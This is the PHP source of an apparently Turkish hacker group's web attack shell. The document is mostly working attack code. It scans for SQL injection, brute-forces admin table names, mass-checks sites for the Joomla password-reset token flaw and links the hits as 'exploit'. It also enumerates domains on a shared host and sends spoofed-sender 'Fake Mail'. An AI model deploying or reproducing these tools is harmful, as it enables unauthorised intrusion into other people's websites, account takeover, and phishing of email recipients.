[ + ] BLaSTER Kral Shell [ + ]

1. <?PHP
2. /*
3. Kodlama by BLaSTER
4. from TurkGuvenligi
5. */
6. ini_set('max_execution_time',0);
7. ob_start();
8. $tablo = "admin
9. admins
10. users
11. uyeler
12. uye
13. kullanici
14. kullanicilar
15. member
16. members
17. haber
18. haberler
19. anket
20. administrator
21. editor
22. editors
23. webmaster
24. diary
25. admin
26. a_admin
27. x_admin
28. m_admin
29. adminuser
30. admin_user
31. adm
32. article_admin
33. administrator
34. manage
35. manager
36. member
37. memberlist
38. tbluser
39. tbl_user
40. tbl_users
41. user
42. users
43. userinfo
44. user_info
45. admin_userinfo
46. userlist
47. user_list
48. login
49. reguser
50. movie
51. movies
52. news
53. password
54. clubconfig
55. config
56. company
57. book
58. art
59. bbs
60. dv_admin
61. webmaster";
62. ?>
63. <style type="text/css">
64. <!--
65. body,td,th {
66. color: #FFFFFF;
67. font-family: tahoma;
68. font-size: 11px;
69. }
70. body {
71. background-color: #000000;
72. }
73. .style4 {font-weight: bold}
74. a:link {
75. color: #CCCCCC;
76. }
77. a:visited {
78. color: #CCCCCC;
79. }
80. a:hover {
81. color: #666666;
82. }
83. a:active {
84. color: #CCCCCC;
85. }
86. -->
87. table{border:1px solid #FFFFFF;}
88. tr{border:1px solid #FFFFFF;}
89. td{border:1px solid #FFFFFF;}
90. input{background-color:#CCCCCC;
91. font-family:Georgia, "Times New Roman", Times, serif;
92. color:#000000;
93. border:1px dashed #FFFFFF;
94. font-size:12px;}
95. textarea{background-color:#CCCCCC;
96. font-family:Georgia, "Times New Roman", Times, serif;
97. color:#000000;
98. border:1px dashed #FFFFFF;
99. font-size:12px;}
100. .style6 {
101. font-size: 24px;
102. font-weight: bold;
103. font-style: italic;
104. }
105. </style>
106. <title>BLaSTER</title>
107.  
108.   <div align="center">
109.     <table width="887" border="1">
110.       <tr>
111.         <td height="50" colspan="3"><div align="center"><span class="style6">By BLaSTER</span><br />
112.           TurkGuvenligi Ekibi<br />
113.           <br />
114.         <a href="<?=$_SERVER['PHP_SELF']?>">sayfayi tekrar aç</a></div></td>
115.       </tr>
116.       <tr>
117.         <td width="275" valign="top"><form action="" method="post" name="reverse" id="form1">
118.             <p><strong>Server listeleyici</strong><br />
119.               <br />
120.               <input name="site" type=text size="40">
121.               <input type="submit" value="Tara">
122.               <br />
123.               <?PHP
124. $site=$_POST['site'];
125. if($site){
126. $ch=curl_init();
127. curl_setopt($ch,CURLOPT_URL,"http://www.guerrilladns.com/index.php");
128. curl_setopt($ch,CURLOPT_RETURNTRANSFER,TRUE);
129. curl_setopt($ch,CURLOPT_POST,1);
130. curl_setopt($ch,CURLOPT_POSTFIELDS,"domain=".$site);
131. $al=curl_exec($ch);
132. curl_close($ch);
133.  
134. preg_match_all('#rel="nofollow" >(.*?)</a>#si',$al,$ver);
135.  
136.  
137. foreach($ver[1] as $cikti){
138. ob_flush();
139. flush();
140. usleep(100000);
141. echo $cikti.'<br>';
142. }
143. }
144. ?>
145.             </p>
146.         </form></td>
147.         <td width="282" height="100" valign="top" bordercolor="#FFFFFF"><form method="post" action="">
148.           <form action="" method="post" name="form1" id="form1">
149.             <p><strong>Tablo bulucu<br />
150.               </strong><br />
151.               Site:
152.               <input name="site2" type="text" id="site" size="45" />
153.               <br />
154.               <br />
155.               Referans olacak kodu giriniz:
156.               <input name="refkod" type="text" id="refkod" value="cannot find the input table or query" size="40" />
157.             </p>
158.             <label><br />
159.             <textarea name="tablo" cols="50" rows="3" id="tablo"><?=$tablo?>
160.             </textarea>
161.             </label>
162.             <label> <br />
163.             <input name="submit1" type="submit" id="submit1" value="Ara ve bul" />
164.             </label>
165.             <br />
166.             <?PHP
167. $tablo=htmlspecialchars($_POST['tablo']);
168. $site=$_POST['site'];
169. $refkod=$_POST['refkod'];
170. if($site && $tablo && $refkod){
171. $satirlar=explode("\n",$tablo);
172. foreach($satirlar as $s){
173. $son = $site." ".$s;
174. $son2 = str_replace(" ","+",$son);
175. $son3 = trim($son2);
176. ob_flush();
177. flush();
178. usleep(100000);
179. $ch=curl_init();
180. curl_setopt($ch,CURLOPT_RETURNTRANSFER,TRUE);
181. curl_setopt($ch,CURLOPT_URL,$son3);
182. $al=curl_exec($ch);
183. curl_close($ch);
184. if(eregi($refkod,$al)){
185. echo $s . '--> <font color="red">yok</font><br>' ;
186. }else{
187. echo $s . '--> <font color="green">var</font><br>' ;}
188. }
189. }
190. ?>
191.           </form></td>
192.         <td width="308" valign="top" bordercolor="#FFFFFF"><form action="" method="post" name="form2" id="form2">
193.           <p>
194.             <label></label>
195.             <label><strong>Hex çevirici <br />
196.             <br />
197.             <input name="hex" type="text" id="hex" size="40" />
198.             </strong></label>
199.             <strong>
200.             <input name="submit2" type="submit" id="submit2" value="Çevir" />
201.             <br />
202.             <?PHP
203.   $hex=htmlspecialchars($_POST['hex']);
204. if($hex){
205. echo '0x'.bin2hex($hex);
206. }
207.   ?>
208.             </strong></p>
209.         </form>
210.             <form action="" method="post" name="form3" id="form3">
211.               <strong>Ip adresi alici </strong><br />
212.               <br />
213.               <label>
214.                 <input name="ip" type="text" id="ip" size="40" />
215.               </label>
216.               <label>
217.                 <input name="submit3" type="submit" id="submit3" value="Göster" />
218.               </label>
219.               <div align="left">
220.                 <?PHP
221. $ip=htmlspecialchars($_POST['ip']);
222. if($ip){
223. $adres=gethostbyname($ip);
224. echo '<font color="red">'.$ip.'</font> <br> <font color="green">'.$adres.'</font>';
225. echo'<br> <a href="http://www.bing.com/search?q=ip%3A'.$adres.'+&go=&form=QBLH&filt=all" target="_blank">Bing arama sayfasini aç</a>';
226. }
227. ?>
228.               </div>
229.             </form>
230.           <form action="" method="post" name="form6" id="form6">
231.             <strong>Md5 </strong><br />
232.             <br />
233.             <label>
234.               <input name="md5" type="text" id="md5" size="40" />
235.             </label>
236.             <label>
237.               <input name="submit4" type="submit" id="submit4" value="Olustur" />
238.             </label>
239.             <span class="style4">
240.             <div align="left">
241.               <?PHP
242. $md5=htmlspecialchars($_POST['md5']);
243. if($md5){
244. echo md5($md5);
245. }
246. ?>
247.             </div>
248.             </span>
249.         </form>      </td>
250.       </tr>
251.       <tr>
252.         <td width="275" height="100" valign="top" bordercolor="#FFFFFF"><form action="" method="post" name="form5" id="form5">
253.           <p><strong>Joomla token<br />
254.                 <br />
255.             </strong>
256.               <textarea name="liste2" cols="50" rows="8"></textarea>
257.               <br />
258.               <input name="submit6" type="submit" id="submit6" value="Taramaya basla" />
259.               <br />
260.               <?PHP
261. $liste=htmlspecialchars($_POST['liste2']);
262. if($liste){
263. $satirlar=explode("\n",$liste);
264. foreach($satirlar as $s){
265. ob_flush();
266. flush();
267. usleep(100000);
268. $cikti=trim($s);
269. $ekle="/index.php?option=com_user&view=reset&layout=confirm";
270. $bla=$cikti."".$ekle;
271. $ch=curl_init();
272. curl_setopt($ch,CURLOPT_RETURNTRANSFER,TRUE);
273. curl_setopt($ch,CURLOPT_URL,$bla);
274. $al=curl_exec($ch);
275. curl_close($ch);
276. if(eregi('token',$al)){
277. echo '<font color="green">'.$cikti.'</font> --> <font color="green"><a href="http://'.$bla.'" target="_blank">exploit</a></font><br>';
278. }else{
279. echo $cikti.' --> <font color="red">yok</font><br>';
280. }}
281. }
282. ?>
283.           </p>
284.         </form></td>
285.         <td height="100" valign="top" bordercolor="#FFFFFF"><form action="" method="post" name="form4" id="form4">
286.           <p><strong>SQL injection tarama</strong><br />
287.               <br />
288.               <textarea name="liste1" cols="50" rows="8"></textarea>
289.               <input name="submit5" type="submit" id="submit5" value="Taramaya basla" />
290.               <br />
291.               <?PHP
292. $liste=htmlspecialchars($_POST['liste1']);
293. if($liste){
294. $satirlar=explode("\n",$liste);
295. foreach($satirlar as $s){
296. $tmz=trim($s);
297. $son=$tmz.""."1'a";
298. ob_flush();
299. flush();
300. usleep(100000);
301. $ch=curl_init();
302. curl_setopt($ch,CURLOPT_RETURNTRANSFER,TRUE);
303. curl_setopt($ch,CURLOPT_URL,$son);
304. $al=curl_exec($ch);
305. curl_close($ch);
306. if(eregi("Unclosed",$al)){
307. echo $son.' <br> <font color="green">MSSQL</font><br>';
308. }
309. elseif(eregi("SQL syntax",$al)){
310. echo $son.' <br> <font color="green">MySQL</font><br>';
311. }
312. elseif(eregi("MySQL",$al)){
313. echo $son.' <br> <font color="green">MySQL</font><br>';
314. }
315. elseif(eregi("Syntax error",$al)){
316. echo $son.' <br> <font color="green">Access</font><br>';
317. }
318. elseif(eregi("Access",$al)){
319. echo $son.' <br> <font color="green">Access</font><br>';
320. }
321. elseif(eregi("JET Database",$al)){
322. echo $son.' <br> <font color="green">Jet Db</font><br>';
323. }else{
324. echo $son.' <br> <font color="red">Yok</font><br>';
325. }}
326. }
327. ?>
328.           </p>
329.         </form></td>
330.         <td width="275" height="100" valign="top" bordercolor="#FFFFFF"><form id="form7" name="form7" method="post" action="">
331.           <strong>Fake Mail</strong>
332.           <p>Gönderen email:
333.             <label>
334.               <input name="kim" type="text" id="kim" size="33" />
335.               </label>
336.               <br />
337.             Gönderen isim:
338.             <input name="isim" type="text" id="isim" size="33" />
339.             <br />
340.             Gidecek email:
341.             <input name="kime" type="text" id="kime" size="33" />
342.             <br />
343.             Baslik:
344.             <input name="baslik" type="text" id="baslik" size="33" />
345.             <textarea name="icerik" cols="50" rows="8" id="icerik"></textarea>
346.             <br />
347.             <input name="submit62" type="submit" id="submit62" value="Gönder" />
348.             <br />
349.             <?PHP
350. $kim=$_POST['kim'];
351. $kime=$_POST['kime'];
352. $isim=$_POST['isim'];
353. $baslik=$_POST['baslik'];
354. $icerik=$_POST['icerik'];
355. if($kim && $kime && $isim && $baslik && $icerik){
356. $gonder=mail($kime, $baslik, $icerik, "From: ".$isim." <".$kim.">");
357. if($gonder){echo'<script>alert("gonderildi..");</script>';}else{echo'<script>alert("uzgunum bi hata olustu..");</script>';}
358. }
359. ?>
360.           </p>
361.         </form></td>
362.       </tr>
363.       <tr>
364.         <td height="42" colspan="3" valign="bottom" bordercolor="#FFFFFF"><div align="center">
365.           <p>kodlama by <a href="mailto:priv8coder@gmail.com">BLaSTER</a><br />
366.             Thehacker - Agd_Scorp - BLaSTER - Cr@zy_King - KinSize - JeXToXiC - s3f4 - rx5 <br />
367.   "Hakim beye söyledik, biz suça meyilli insanlariz.."</p>
368.           </div>          <div align="center"></div>          <div align="center"></div></td>
369.       </tr>
370.     </table>
371.   </div>